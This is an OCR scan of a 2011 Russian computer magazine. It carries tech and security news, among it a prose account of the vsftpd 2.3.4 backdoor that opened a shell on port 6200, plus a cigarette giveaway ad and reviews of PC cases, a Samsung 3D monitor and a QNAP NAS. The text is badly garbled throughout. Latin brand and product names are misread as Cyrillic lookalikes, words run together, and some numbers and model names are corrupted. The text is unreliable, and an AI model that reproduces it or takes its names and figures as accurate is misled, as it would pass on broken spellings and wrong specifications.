дюйма, 50м, СЧ-и В Ч -динамики: 4 х 1,25 
дюйма. Выходная мощность колонок: ПМ5 2 
х 2ѴѴ . Соотношение си гнал -шум: >75 дБ (А). 
Искажение: ~1 %. Также хотелось бы заметить, 
что МР250 уже удостоились таких престижных 
наград, как Пебсіоі: сіезідп аѵѵагсі ѵѵі п пег 201 1 , 

ІР Ргобисі: сіезідп аѵѵагсі 201 1 и Іппоѵабопз 
Іпіегпаііопаі СЕ5. 




Затзипд баіаху 5 II бьет рекорды продаж. За 55 дней было продано 
3 млн аппаратов. Первому баіаху 3 этой отметки удалось достичь 
лишь через 85 дней. 



ПЕТР I ДАРИТ ПРИЗЫ ВЫИГРАЙ КВАРТИРУ В ТВОЕМ ГОРОДЕ! 

В августе 201 1 года марка «ПЁТР I» вновь проводит полюбившуюся многим программу «Выиграй квартиру 
в твоем городе!». За 5 лет обладателями сертификатов на покупку квартиры стал и уже 55 счастливчиков, а 
десятки тысяч человек получили другие ценные призы. Акция продлится четыре месяца. Хочешь попол- 
нить ряды победителей? Тогда ищи коды под крышками промо-пачек«ПЁТР I» с изображением главного 
приза и регистрируй их на сайте ѵѵѵѵѵѵ.реіг-і .ги или по 5М5 на номер 5206. Среди призов сертификаты на 
покупку квартир, ЖК-телевизоров, МР4- и ОѴО-плееров. Также каждый часты можешь выиграть бонус на 
счет мобильного телефона, эквивалентный сумме 100 рублей. Самые активныеучастники могут получить 
гарантированные призы - футболку или ветровку. 




ПЁТР 

еийтахорчя 



КУРЕНИЕ 

УБИВАЕТ 




МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ: 
КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 






МЕ6АЫЕШ5 



САЙТЫ ЗАКРЫВАЮТ БЕЗ ПОСТАНОВЛЕНИЯ СУДА 



Выяснилось, что новый закон «О полиции» развязал руки нашим 
правоохранительным органам, и теперь они могут блокировать доступ к 
«нежелательным» ресурсам, не дожидаясь соответствующего постанов- 
ления суда. Ст. 13 закона «О полиции» гласит, что полиция имеет право 
«вносить руководителям и должностным лицам организаций обязатель- 
ные для исполнения представления об устранении причин и условий, 
способствующих реализации угроз безопасности граждан и обществен- 
ной безопасности, совершению преступлений и административных 
правонарушений». Ранее закон обязывал провайдеров лишь рассмо- 
треть представление, но не выполнять его в обязательном порядке. Уже 
есть и первые прецеденты. В мае компания «Централ партнершип»об- 
ратиласьсзаявлением в полицию, так как в Сети нелегально предлагали 
скачать фильм «Свадьба по обмену», права на который принадлежат ЦП. 
Загвоздка заключалась втом, что лентутиражировали сайты, зареги- 
стрированные отнюдь не в России, а в Чехии, Голландии и Великобрита- 
нии. В итоге, управление «К» МВД России решило блокировать пиратов 
на уровне магистральных провайдеров и распространило предписание, 
согласно которому доступ ксеми сайтам, предлагавшим фильм, должен 
был быть перекрытв сроке начала мая по начало июня. Провайдеры 
ІРТР ЫеРл/огкз, ПЕТЫ и «Рускомнет»стребованием полиции согласились 
и доступ к сайтам для своих пользователей блокировали. Втоже время 
«Комкор», «Транстелеком», «Вымпелком», «МТС», «Ростелеком» и «Рас- 
ком»стребованием полиции не согласились, итеперьна них собираются 
жаловаться в Роскомнадзор. Ситуация, в общем-то, совсем не веселая. 




Представь, что какому-то злопыхателю сильно не нравится твой ресурс, 
он находит какой-нибудь пустяк, к которому можно прицепиться и пишет 
жалобу в «органы». Полиция это заявление рассматривает, и велик шанс, 
что сайт в самом деле заблочат на уровне магистрального провайдера. 
Весело? Вот и нам что-то не очень. 



» 5,14 ГГц - до такой частоты энтузиастам удалось разогнать новый 
флагманский процессор АМР РХ-8130Р 3,8 ГГц на архитектуре ВиІШоге. 
А он еще даже не появился в продаже. 



ЗАЕЕТѴ А№ ЗЕСІЖІТУ СЕЯТЕК ХАКНУЛИ 



На сайте Мі сгозоіЧ есть служба с говорящим названием Заіеіу апб 
Зесигііу Сепіег, которую, как это ни смешно, взломали. Хакерам уда- 
лось «отравить» поисковик Центра безопасности, поместив в него 
ссылки, ведущие на сомнительные порносайты, буквально кишащие 
троянами. Жаль, что ха к вышел не слишком масштабный — увидеть 
вредоносные ссылки можно было лишь после ввода в поисковик 
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запросов «рогп» или «зігеатіпд». Вряд ли нашлось много людей, 
искавших в Центре безопасности подобные вещи. Місгозоіі была 
вынуждена на некоторое время приостановить работу поискового 
сервиса, но вскоре его работа возобновилась в штатном режиме. Ка- 
ким образом неизвестные взломщики сумели провернуть этот трюк, к 
сожалению, не сообщается. 

Создатель популярного сверхзащищенного РТР-сервера ѵзГГрсІ и из- 
вестный эксперт в области информационной безопасности Крис Эванс 
сообщил, что некиезлоумышленники внедрили бэкдор в исходники его 
детища. Измененный архив ѵзГі;рсІ-2. 3.4. іаг.дт. распространялся через пер- 
вичный сервер проекта. При ближайшем рассмотрении атака оказалась 
весьма странной. Вредоносный код запускал зЬеІІ на ТСР-порту 6200, если 
в РТР-логине пользователя присутствовал смайл, что явно не характе- 
ризирует изменения сточки зрения желания выполнить массовую атаку. 
Болеетого, в код не было встроено никаких механизмов для сообщения 
обустановке протрояненного пакета. Непонятно, каким образом хакеры 
пытались выявить пораженные бэкдором хосты и пытались ли вообще. 

Сам Эванс склоняется ктому, что это скорее была обычная хулиганская вы- 
ходка, нежели целенаправленная атака. Какзлоумышленники взломали 
аккаунт на хостинге проекта, неизвестно, но сразу после атаки Эванс 
переместил сайт проекта со старого хостинга в инфраструктуру Ооодіе Арр 
Епдіпе. Версия строяном внутри была доступна для скачивания околотрех 
дней, при этом количество загрузок не сообщается. Мораль этой истории 
такова: всегда проверяй контрольную сум мутех файлов, которыеты скачи- 
ваешь. Даже если речь идет о каком-то серьезном приложении. 



► 014 
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#6006І-Е В ЦИФРАХ 



Впечатляющие цифры об Апсігоісі, 
Оіготе и Ооодіеч- 



Про финансы: 

$9,03 млрд 

составила рекордная выручка 
компании за второй квартал 201 1 
года, правда цифра приведена без 
затратна привлечение трафика. 

$6,23 млрд 

компания заработала 
на собственных сайтах. 

$2,48 млрд 

принесли партнерские сайты 
через программы АсІЗепзе. 

$2,1 1 млрд 

во столько обошлось привлечение 
трафика (часть этой суммы идет 
втом числе производителям 
браузеров). 



Про команду: 

28,768 

штатных сотрудников ра- 
ботает в подразделениях 
Соодіе по всему миру. 

Про мобильную 
платформу: 

500 000 

устройств на Апсігоісі 
активируются каждый день. 

130 млн 

девайсов на базе Апсігоісі уже 
используются во всем мире. 

6 млрд 

загрузок сделали из Апсігоісі 
МагкеЙа пользователи. 



Про веб: 

>160 млн 

человек пользуются 
браузером Соодіе СЬготе. 

2,3 млрд 

столько раз нажимается 
кнопка «+1 » ежедневно. 

Про социальную сеть: 

$20 млрд 

столько суммарно 
инвестировали в 6оод1е+. 

10 млн 

пользователей зарегистриро- 
валось в 6оодІе+ за две недели 
после старта. Это 1 ,3% от всей 
аудитории РасеЬоок. 



Румынские власти совместно с ФБР и агентами секретной службы 
арестовали 90 подозреваемых в мошенничестве на еВау. 

ПРОСЛУШКА ЗКѴРЕ НЕ ЗА ГОРАМИ 

Спецслужбы многих стран мира давно точат зуб на 5 куре за то, 
что его нельзя легально и удобно прослушивать. Программу часто 
называют идеальной для террористов, а разработчиков множество 
раз пытались призвать к ответу. После того как в мае Зкуре был при- 
обретен корпорацией Мі егозой за $8,5 млрд, многие ожидали неко- 
торых перемен в этой области и, похоже, перемены действительно 
последуют. Стало известно, что еще в декабре 2009 года, задолго 
до сделки по покупке Зкуре, МісгозоЙ подала заявку на патент 
технологии «легального перехвата» (І_едаІ Іпіегсері), позволяющей 
незаметно для юзера записывать звонки, выполняемые в Зкуре и 
других ѴоІР-сетях. По сути, технология напоминает стандартные 
инструменты, которые используются телекоммуникационными 
компаниями и производителями оборудования связи для того, 
чтобы удовлетворять государственным требованиям в прослушке. 
Документ гласит: «данные, связанные с запросом на установление 
соединения, изменяются таким образом, чтобы соединение про- 
ходило через прокси для возможности записи и модификации». Су- 
ществующие методы, предназначенные для перехвата разговоров 
по аналоговым линиям (Р0Т5), в сетях ѴоІР и других сетях, основан- 
ных на современных технологиях, не работают. Запатентованная 
технология должна это исправить. 
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РЕВВІІЛЛ 



I Антон Николаев 




Тестирование корпусов среднего ценового диапазона 

о Выбор корпуса - дело не самое простое. И к данному процессу 
необходимо подойти весьма осознанно, со знанием всех тонкостей. 
Чтобы ты знал, на какие особенности будущего жилища для твоего 
компьютера необходимо обратить внимание, давай перейдем 
непосредственно к сегодняшнему тесту. 

Братство кольца 

Стоиттолько взглянуть на широкий ассортимент всевозможных корпусов 
на рынке, чтобы понять — выбор этот не легче приобретения автомоби- 
ля. Вспоминаются слова известного героя: «Машина — не роскошь, а 
средство передвижения». Цитата турецкоподданного Остапа Сулеймана 
однозначно сможет разделить всех пользователей ПК на две группы: 
на людей, которым все равно, как выглядит корпус, вмещающий все 
«железо», и на тех, кто получает не только эстетическое удовольствие от 
красивого девайса, но и функциональную пользу при сборке и эксплуата- 
ции системного блока. Сегодняшнеетестированиесформировано именно 
для второй категории людей. Ведь порядка 200 долларов за «железное 
хранилище» отважится отдать л ишь этот контингент пользователей. А вот 
будут л и да иные траты напрасны, нам и предстоит сегодня выяснить. 

Методика тестирования 

Главное, что мы должны поведатьтебе об этих корпусах — это ощущения 
(положительные и отрицательные), которые мы испытали в процессе экс- 
плуатации данныхустройств. Поэтому акцент в статье будет сделан именно 
на это. Однако не стоит забывать и протемпературные показатели «желе- 
за», установленного внутри корпуса: за комфортные и прохладныеусловия 
комплектующиеточноскажуттебе спасибо в виде тихой и долгой работы. 

Во времятестирования мы измеряли температуру процессора, видеокарты 
и жесткого диска. «Камень» максимально загружался вычислительным 
приложением І_іпХ. А вот видеокарта — синтетическим приложением 
РигМагк. Наконец, температуру НОО фиксировал программный комбайн 
АЮА64 Ехігете Есіібоп. Комплекгующиетестировались в закрытом корпусе 
втечение20 минут, все доступные вентиляторы работали в штатном режиме. 



Тестовый стенд: 

Системная плата: 

АЗРоск 890РХ ОеІихеЗ 

Процессор: 

А/ѴЮ РОепот II 970, 3500 МГц 

Кулер: 

2аІтап СЫР5 10Х Ехігете 

Оперативная память: 

Согзаіг Оотіпаіог ОТ 2000 МГц, 4 Гб 

Видеокарта: 

5АРРНІРЕ Вабеоп НЭ 6970 

Жесткий диск: 

ѴѴезіегп ОідііаІ ѴЮ2001РА55, 2 Тб 

Блок питания: 

Р5Р Ерзііоп, 700 Вт 

Операционная система: 

ѴѴіпсІоѵѵз Ѵізіа х64 



► 016 
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АегосооІ Хргесіаіог 
ЕѵіІ ВІаск ЕсІШоп 



Апіес ОР-35 



Технические характеристики: 

ФОРМ-ФАКТОР: тАТХ, АТХ Ріех АТХ, Е-АТХ, ХБ-АТХ 

РАЗМЕЩЕНИЕ БЛОКА ПИТАНИЯ: снизу 
ОТСЕКОВ ДЛЯ 5-ДЮЙМОВЫХ УСТРОЙСТВ: 6 
ОТСЕКОВ ДЛЯ 3,5-ДЮЙМОВЫХ УСТРОЙСТВ: 6 
ВЕНТИЛЯТОРЫ: 2x230 мм 
ОТВЕРСТИЯ ДЛЯ ВОДЯНОГО ОХЛАЖДЕНИЯ: есть 

РАЗЪЕМЫ НА ЛИЦЕВОЙ ПАНЕЛИ: 4хІІ5В 2.0, ІхеЗАТА, наушники, микрофон 



Технические характеристики: 

ФОРМ-ФАКТОР: Міпі-ІТХ, тАТХ, АТХ 

РАЗМЕЩЕНИЕ БЛОКА ПИТАНИЯ: снизу 

ОТСЕКОВ ДЛЯ 5-ДЮЙМОВЫХ УСТРОЙСТВ: 3 

ОТСЕКОВ ДЛЯ 3.5-ДЮЙМОВЫХ УСТРОЙСТВ: 6 

ВЕНТИЛЯТОРЫ: 3x1 20 мм, 1 хі 40 мм 

ОТВЕРСТИЯ ДЛЯ ВОДЯНОГО ОХЛАЖДЕНИЯ: есть 

РАЗЪЕМЫ НА ЛИЦЕВОЙ ПАНЕЛИ: 2хУ5В 2.0, наушники, микрофон 



□ □□ 



□ □□ 



На борту этого очень большого корпуса целых два 230-миллиметровых 
вентилятора, да еще с оранжевой подсветкой. По периметру устройства 
есть масса свободных посадочных мест под менее габаритные пропел- 
леры, втом числе и на декоративном пластиковом окне. Внутри «разбро- 
саны»эластичные резиновые перегородки для того, чтобы сборщик мог 
спрятать все провода. В этом корпусе реализована идея безвинтового 
крепления большинства девайсов. Винчестеры фиксируются при помо- 
щи выдвижных салазок, а РСІ-устройства — посредством пластиковых 
защелок. Но никто не помешаеттебе воспользоваться старыми добрыми 
винтами. 

Свободного пространства в корпусе очень много. Крометого, необъят- 
ные просторы АегосооІХргесІаФг ЕѵіІ ВІаск Есіібоп позволят разместить в 
нем достаточно габаритную СВО. 

Все-таки шум отдвух крупногабаритных вентиляторов весьма сущест- 
венный. Даже несмотря на то, что на лицевой панели есть регуляторы 
скорости вращения оных. 



О качестве и о высоком уровне исполнения продуктов Апіес можно 
говорить очень долго. Поэтому мы лучше сконцентрируемся на модели 
О Р-35, выполненной в черныхтонах. 

Корпус имеет весьма небольшие габариты, что можно расценивать и как 
плюс, и какминус. На что точно инженеры Апіес не поскупились, такэто 
на количество вентиляторов внутри. Три «Карлсона» из четырех светятся 
ярко-белым цветом, что очень необычно и красиво. Кстати, скорость 
всех «ветродуев» регулируется. 

Большое пластиковое окно на боковой стенке позволит увидеть все 
комплектующие внутри. Приятно, что инженеры Апіес не забыли про 
гипотетическое наличие 550. Именно для твердотельных накопителей в 
корпусе присутствует несколько 2,5-дюймовых посадочных мест. 
Располагает Апіес ОР-35 и встроенной док-станцией, которая служит 
для «горячей» установки запоминающих устройств. Очень удобное 
нововведение. Все же небольшие габариты сказались на свободном 
пространстве корпуса. Там оченьтесно, и мы настоятельно рекомендуем 
использовать только модульный блок питания. Наша тестовая видеокар- 
та влезла в недра Апіес ОЕ-35 струдом. 

Четыре вентилятора — это, конечно, хорошо, но не длятвоихушей. 

Шум от крыльчатокслышен весьма отчетливо, и вряд ли кто-то захочет 
мириться сэтим. 

Не секрет, что продукты фирмы Апіес стоят немалых денег, и нынешний 
представитель не стал исключением. 
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РЕВВІІЛЛ 




Согзаіг 600Т 



ОІСАВУТЕ Сиріо 6140 



Технические характеристики: 

ФОРМ-ФАКТОР: тАТХ, АТХ 

РАЗМЕЩЕНИЕ БЛОКА ПИТАНИЯ: снизу 

ОТСЕКОВ ДЛЯ 5-ДЮЙМОВЫХ УСТРОЙСТВ: 4 

ОТСЕКОВ ДЛЯ 3,5-ДЮЙМОВЫХ УСТРОЙСТВ: 6 

ВЕНТИЛЯТОРЫ: 1x120 мм, 2x200 мм 

ОТВЕРСТИЯ ДЛЯ ВОДЯНОГО ОХЛАЖДЕНИЯ: есть 

РАЗЪЕМЫ НАЛИЦЕВОЙ ПАНЕЛИ: 4хІІ5В 2.0, 1x115В 3.0, 1 хі ЕЕЕ 1 394, 



Технические характеристики: 

ФОРМ-ФАКТОР: тАТХ, АТХ 

РАЗМЕЩЕНИЕ БЛОКА ПИТАНИЯ: сверху 

ОТСЕКОВ ДЛЯ 5-ДЮЙМОВЫХ УСТРОЙСТВ: 5 

ОТСЕКОВ ДЛЯ 3,5-ДЮЙМОВЫХ УСТРОЙСТВ: 5 

ВЕНТИЛЯТОРЫ: 2x1 20 мм 

ОТВЕРСТИЯ ДЛЯ ВОДЯНОГО ОХЛАЖДЕНИЯ: есть 

РАЗЪЕМЫ НАЛИЦЕВОЙ ПАНЕЛИ: 2хІІ5В 2.0, ІхеЗАТА, ІхРігеѴѴіге, науш- 



наушники, микрофон 



ники, микрофон 



□ □ 



□ □□ 



Мы знаем Согзаіг как первоклассного производителя оперативной 
памяти. Но вектор деятельности американской компании постоянно 
расширяется. Об этом свидетельствует появление на рынке кулеров, 
блоков питания, гарнитур и корпусов подэтим брендом. В итоге, за 
что бы ни бралась эта компания, результат окажется положительным. 
Первая ассоциация, пришедшая нам в голову после «откупоривания» 
боковой крышки — простор. Внутри СогзаігбООТ очень много свободного 
пространства. Очень много — означаеточень-очень-очень много сво- 
бодного пространства. Материнская плата буквальнотеряется внутри 
этого «гиганта». Сразу бросаются в глаза уже отмеченные в прошлых 
моделях резиновые мембраны, которые вмонтированы для удобной 
компоновки проводов и шлейфов. Два огромных вентилятора с диодной 
подсветкой расположены весьма удачно: один обдувает винчестеры, 
а второй — процессорный кулер и память. На верхней панели, помимо 
весьма полезных разъемов, есть регулятор скорости вращения установ- 
ленных вентиляторов. Кстати, неприятного шума от последнихзамечено 
не было. 

Пожалуй, единственный минус модели — несколько завышенная цена. 
При этом комплектация СогзаігбООТ, впрочем, каки всех остальных, 
весьма скудная. Набор винтов и несколько стяжекдля проводов — все, 
чем ограничился производитель. 



Что только не производит компания СІСАВУТЕ. Заниматься корпусами 
она начала лет семь назад. За это время уданного бренда накопился 
определенный опыти собственные наработки. Оченьстрогий дизайн 
корпуса СІСАВУТЕ Сиріо 6140 напоминаетэдакий монолитный шкаф. Он 
не очень большой и, пожалуй, самый легкий из всехучастников сегод- 
няшнего тестирования. Все из-за применения алюминия. Два вентиля- 
тора объединены в один трехпиновый разъем, что оченьудобно. Кстати, 
оба почти не шумят. На боковой стенке есть решетка. По большому счету, 
она служит декоративным элементом корпуса. Отсекдля блока питания 
расположен сверху, как в классическом варианте компоновки элементов. 
Оптические накопители скрываются под тяжелой металлической двер- 
цей, на вершине петли которой, кстати, находится кнопка включения ПК. 
Очень оригинальный и интересный ход. Коммуникационные разъемы 
на «макушке» системного блока спрятаны под пластиковой шторкой. В 
наличии пара 115В 2.0 и по одному е5АТА, ЕігеѴѴіге, атакже мини-джеки 
для наушников и микрофона. 

Вся периферия внутри крепится при помощи пластиковыхзащелок. Нам 
показалось, что это не самый удобный вариант, пришлось демонтиро- 
вать. Тестовая видеокарта не влезла в этот корпус, помешала корзина 
для жестких дисков, но благодаря тому, что ее можно снять, плату мы 
все-таки установили. 



► 018 
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Технические характеристики: 

ФОРМ-ФАКТОР: тАТХ, АТХ, 551 СЕВ 

РАЗМЕЩЕНИЕ БЛОКА ПИТАНИЯ: сверху 

ОТСЕКОВ ДЛЯ 5-ДЮЙМОВЫХ УСТРОЙСТВ: 5 

ОТСЕКОВ ДЛЯ 3,5-ДЮЙМОВЫХ УСТРОЙСТВ: 5 

ВЕНТИЛЯТОРЫ: 1x1 20 мм, 3x180 мм 

ОТВЕРСТИЯ ДЛЯ ВОДЯНОГО ОХЛАЖДЕНИЯ: есть 

РАЗЪЕМЫ НА ЛИЦЕВОЙ ПАНЕЛИ: 2хІІ5В 2.0, наушники, микрофон 

■■■■■■■■■□ 



Технические характеристики: 

ФОРМ-ФАКТОР: тАТХ, АТХ, Е-АТХ 
РАЗМЕЩЕНИЕ БЛОКА ПИТАНИЯ: снизу 
ОТСЕКОВ ДЛЯ 5-ДЮЙМОВЫХ УСТРОЙСТВ: 4 
ОТСЕКОВ ДЛЯ 3,5-ДЮЙМОВЫХ УСТРОЙСТВ: 5 
ВЕНТИЛЯТОРЫ: 1 х200 м м , 1 х 1 40 м м 
ОТВЕРСТИЯ ДЛЯ ВОДЯНОГО ОХЛАЖДЕНИЯ: есть 
РАЗЪЕМЫ НА ЛИЦЕВОЙ ПАНЕЛИ: 2хІІ5В 3.0, 4x115В 2.0, 1 хе5АТА, науш- 
ники, микрофон 
ВНЕ КОНКУРСА 



Это самый необычный корпус в нашемтестировании применительно к 
расположению в нем компонентов. Однако плохой такую реализацию 
назвать нельзя, однозначно. Скорее, наоборот. Все здесь продумано с 
учетом лучшего охлаждения элементов системного блока. Вся поверх- 
ность днища закрыта тремя большими вентиляторами. А вот периферия 
крепится сверху. Результаты тестирования только подтверждают наши 
высказывания. 

Задумка инженеров заключается в том, что абсолютно все провода 
выходят из одного места, то есть из-под верхней крышки. Сточки зрения 
компоновки «хвостов» — это оченьудобное решение, но вотеслиты 
вынужден часто пользоваться разъемами на материнской плате, такой 
вариант будет не самым удачным, ведь они будут полностью перекрыты 
этой крышкой. 

Корпус оченьтяжелый, на него не пожалели ни идей, ни стали. Все эле- 
менты крепятся при помощи винтов, а свободного пространства здесь 
хоть отбавляй. Положительным моментом является и армированное 
пластиковое окно, сквозь которое будет видно твою мощную систему. 
Аименнотакой она, скорее всего, и будет, потому что устанавливать в 
5іІѵег5іопе Раѵеп 2 слабое, беспомощное «железо» — кощунство! 
Помимо необходимого для сборки компьютера набора в комплекте пос- 
тавки больше нет ничего интересного. 



■■■■■■■■■□ 

Последний участниксегодняшнего тестирования — ТГіегтаЕаке Ееѵеі 
10 ОТ. Компания на рынке уже такдавно, что может себе позволить 
создавать новые проекты совместно с ВМѴѴ. Об этом свидетельствует 
специальный сертификат. Этот«сундук» очень большой и оченьтяжелый 
(12,7 килограммов]. Это действительно роскошный корпус, который к 
моменту выхода номера в печать должен появиться в продаже. Дизайн 
ТГіегтаКаке Ееѵеі 10 ОТ поистине футуристический, есть на что посмот- 
реть. Само собой разумеется, что внутри уйма свободного места (если 
щелкнуть пальцами в недрах этого титана, раздается эхо]. Весьма инте- 
ресна и реализация подключения жестких дисков. Контакты уже на месте, 
остается только вставить винчестер и подключить идущий в комплекте 
провод кблоку питания. Все три вентилятора подключаются с помощью 
одного тоіех-разъема. В верхней части ТГіегтаКаке Ееѵеі 1 0 ОТ есть 
несколько кнопок, которые отвечаютза скорость вращения пропеллеров 
и за цвет, которым все три будут«переливаться», словно новогодняя елка. 
Все внутреннее добро можнозакрыть на ключ, какавтомобиль. 

Чтобы установить ТЬегта Паке Ееѵеі 10 ОТ, понадобится много свободно- 
го пространства на столе или под столом. Фактически потребуется гараж, 
ведь это почти что авто, только без руля. 



Итоги 

Нам больше кописанию данных продуктов добавить нечего, атебе оста- 
ется только сделать правильный выбор в пользутого или иного корпуса. 



Поэтомутрадиционно перейдем к раздаче наград и комплиментов. 
«Выбором редакции» сегодня становится модель 5і ІѵегЭЕопе Раѵеп 2, ко- 
торая произвела очень приятное впечатление нетолько из-за грамотной 
эргономики, но и из-за потрясающего, футуристического ди за й на. И-И 
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РЕВВІІЛЛ 



Изящный 

ГИГАНТ 

Тестирование монитора 
Затзипд 327А7500 

Технические характеристики: 

ДИАГОНАЛЬ ДИСПЛЕЯ: 27" 

МАКСИМАЛЬНОЕ РАЗРЕШЕНИЕ: 1 920x1080 точек 
ТИП МАТРИЦЫ: ТРТ ТЫ 
ЯРКОСТЬ: 300 кд/м2 
СТАТИЧЕСКАЯ КОНТРАСТНОСТЬ: 1000:1 
ВРЕМЯ ОТКЛИКА: 2 мс 




ИНТЕРФЕЙСЫ: НБМІ, БізрІауРогІ:, аудиовыход 



© Большие дисплеи любятнетолько владельцы навороченных 
смартфонов. Нив чем себе не отказывать приятно и сидя за ПК. 
Особенно, если компьютер используется не только в «офисных» 
целях. Если на вашем столе найдется место для 27-дюймового 
монитора —то почемубы и необзавестисьоным?Аеслиу васуже 
имеется мощная видеокарта, то полного удовольствия от ее использо- 
вания с заурядной «семнашкой» вы не ощутите. Получить новые 
впечатления от работы и развлечений за компьютером поможет 
монитор Затзипд 527А750Б. 

Присмотримся поближе 

Про диагональ — один из главных козырей героя сегодняшнего тести- 
рования — мы уже намекнули, но повторимся — это целых 27 дюймов. 
Покрытие дисплея глянцевое, что, какуверяют производители, улучша- 
ет цветопередачу, но превращает монитор в громадное зеркало. 
Подставка у Затзипд 527А75СЮ имееторигинальную цилиндричес- 
кую форму, оченьскромного размера по сравнению с дисплеем, но 
уверенно удерживает его отпадения. Поначалу на ней видна лишь 
одна кнопка — сенсорная клавиша питания. Нажимаем на нее — и как 
по мановению волшебной палочки вокруг поочередно загораются 
остальные. Как вы, наверное, уже догадались, все кнопки сенсорные. 

В общем, Затзипд 527А750Б представляет собою очень изящного ги- 
ганта мониторного мира. Внешних интерфейсов, не считая выхода для 
наушников, всего два: НОМІ и БізрІауРогІ:. На первый взгляд скромно, 
но вряд ли кому-то придет в голову подключать подобный 30-монитор к 
старенькому компьютеру с видеокартой без НОМІ-интерфейса. 

Методика тестирования 

Дабы протестировать данный монитор, мы воспользовались колори- 
метром СоІогѴізіоп ЗрусІегЗ Еіііе. Результаты тестирования видны на 
графике: три линии обозначают красный, зеленый и синий цвета — ос- 
нову цветовой модели РОВ. Идеальной считается цветопередача, если 
всетри линии, не отклоняясь, идутизлевого нижнего угла в верхний 
правый. Соответственно, чем больше отклонение, тем менее реалис- 
тичную картинку мы видим на экране. С помощью всетогоже колори- 
метра также измеряется цветовой охват — он должен быть не меньше 
стандарта зРОВ. Также мы оценивали дизайн монитора, углы наклонов, 
удобство работы с меню и дополнительные функции. 

В ногу со временем 

Но не будем судить о книге только по ее обложке. Пришло время разо- 
браться, каков Затзипд 527А750Б в деле. Дисплей поддерживает раз- 
решение вплоть до 1 980x1 080 пикселей. То есть, можно смело набирать 



стопку НБ-фильмов и игр. Другая особенность монитора — использо- 
вание в качестве подсветки светодиодов, а не привычных ламп с холод- 
ным катодом (ССРЦ Ото позволило сделать корпус дисплея еще более 
тонким и, по заверению маркетологов, усилило «сочность» отображае- 
мых цветов. Такили иначе, хорошоужето, что в светодиодах, в отличие 
отССЕБ, не содержится ртути. Поэтому мониторы можно ронять на пол 
один за другим, не боясь случайно вдохнуть ядовитые испарения. Но не 
нужно! Идем дальше. Было бы жалко, если такой монитор был бы приго- 
ден только для офисных нужд и проверки электропочты. Фанаты все- 
воз м ожн ы х э кш н - и гр будут рады, узнав, что откл и к м атр и ц ы со ста в л я ет 
всего 2 мс, что позволит насладиться самыми динамичными сценами 
из их любимых стрелялок и гонок. Ну и на сладкое — поддержка ЗБ. В 
комплект входят специальные активные очки, синхронизирующиеся 
с монитором по ВІиеІооіЬ.Жаль, что только одни, на дополнительную 
пару придется раскошелиться отдельно. Что вы, вполне возможно, и 
захотите сделать, ведь Затзипд 527А750Б может не только отображать 
ЗБ-контент, но и конвертировать в объем любое 2Б-изображение, будь 
тообычныефильмы или фотоснимки. 

Выводы 

Втом, что размер все-таки имеетзначение, мыубедилисьеще раз. Ос- 
тальные немаловажные для современных мониторов характеристики: 
поддержка ЕиІІНВ, малое время отклика матрицы и, наконец, стильный 
дизайн —также присутствуют в Затзипд 527А750Б. Неплохо было 
бы еще и ТВ-тюнер в придачу получить, но хорошего, как говорится, 
понемножку. 

+ Конвертация 2Б в ЗБ налету. 

- Глянцевое покрытие дисплея. 



> 



Цветовой охват даже немно- Цветопередача 
го больше стандартного на «отлично» 
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РЕГРЕССИРОВАТЬ! 



Тестирование высокопроизводительного сетевого 
накопителя ОМАР ТЗ-459 Рго II 



© Стоит начать пользоваться Ш’ами, как сразу же понимаешь, какую 
колоссальную пользу несут эти устройства. Новинка от компании (ШР 
придется по вкусу и продвинутым домашним пользователям, и тем, 
кому нужно сделать файловое хранилище для небольшого офиса. 



СЖиз, АШиз, РогМиз! 

Главное в І\ІА5’е, несомненно, железо. Новый СНЧАРТ5-459 Рго II обза- 
велся поддержкой мощного центрального процессора Іпіеі Аіот Р525, 
функционирующего на частоте 1 800 МГц. Поверь, для сетевого хранили- 
ща двухъядерный Аіот с та кой тактовой частотой - отличный вариант. 
Технология НурегТЬгеасІіпд позволяетпомимодвухфизическихядер 
задействовать еще и два виртуальных. На подмогу чипу разработчи- 
ки выделили 1 Гбайтоперативной памяти стандарта ООРЗ. Данного 
объема хватите лихвой при использовании устройства дома. Но если 
потребуется, чтобы ОІМАРТ5-459 Рго II трудился на благо небольшого 
офиса, то всегда можноувеличитьобъем ОЗУ: хранилище обладаетвоз- 
можностью расширения оперативной памяти до 3 Гбайт. Кроме этого, 
хранилища ОІМАР перешли на стандартЗАТАЗ.О. Подводя промежу- 
точный итог, мы видим, что ОІМАРТ5-459 Рго II явно превосходитсвоих 
предшественников: например, в отличии отмодели Т5-459 Рго ис- 
пользуется более шустрый процессор и более прогрессивный стандарт 
памяти йОРЗ (вместо ООР2). Отличительной особенностью всех сетевых 
накопителей ОІМАР является богатая функциональность. Так, новинка 
обладаетсразу парой гигабитных портов РЮ45, которые поддерживают 
использование режимов балансировки нагрузки, отказоустойчивости 
и МиШ-ІР. Крометого, по всему корпусу ОІМАР Т5-459 Рго II разбросано 
пять портов 115В и парочка еЗАТА. Нельзя не отметить и наличие двух 
портов стандарта 115В 3.0, значительно ускоряющего обмен данными с 
внешними устройствами. В совокупности с мощным «железом» накопи- 
тель без проблем справляется с обработкой информации от нескольких 



цифровых видеокамер, ИБП, ѴѴі-РІ -адаптера и ІІ5В-принтеров. При 
всех наворотах и мощном «железе» ОІМАРТ5-459 Рго II обладаеточень 
низким уровнем электропотребления: 19 Вт в спящем режиме и 35 Вт во 
время работы. 

О прошивке и не только 

Железная составляющая сетевого накопителя, несомненно, важна. 

Но не стоитзабывать и о прошивке устройства. Во многом за счет нее 
со временем оно неустареетморально, а наоборот, обрастетновыми 
функциями. Например, последняя версия прошивки 3.4 вводитпод- 
держкудля многодисковых накопителей массива РАЮ 10, совмеща- 
ющего в себе преимущества РАЮ 0 и РАЮ 1 . Также с новой прошив- 
кой стала доступна функция РТРР (РеаИіте Ретоіе Реріісабоп), 
которая предоставляет возможность удаленной репликации в режиме 
реального времени или по заданному расписанию. Кромеэтого, есть 
возможности для бэкапа данных на облачные сервисы Атагоп 53 и 
ЕІербапЮгіѵе. Списокобновлений в новой прошивке можно пере- 
числять еще долго, но лучше познакомиться со всеми функциями 
хранилищ ОІМАР на официальном сайте компании: ѵѵѵѵѵѵ.д пар. ги . 

Выводы 

ОІМАРТ5-459 Рго II является превосходным решением для хранения и 
управления данными какдомадаки в офисе: за счет удобного интер- 
фейса управления, огромного количества мультимедийных функций, 
полной реализации интерфейса І5С5І и высокой надежности. ЗС 
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■ ■ Андрей Минаев 





© Если ты ни разу не терял важные данные и не сталкивался с 
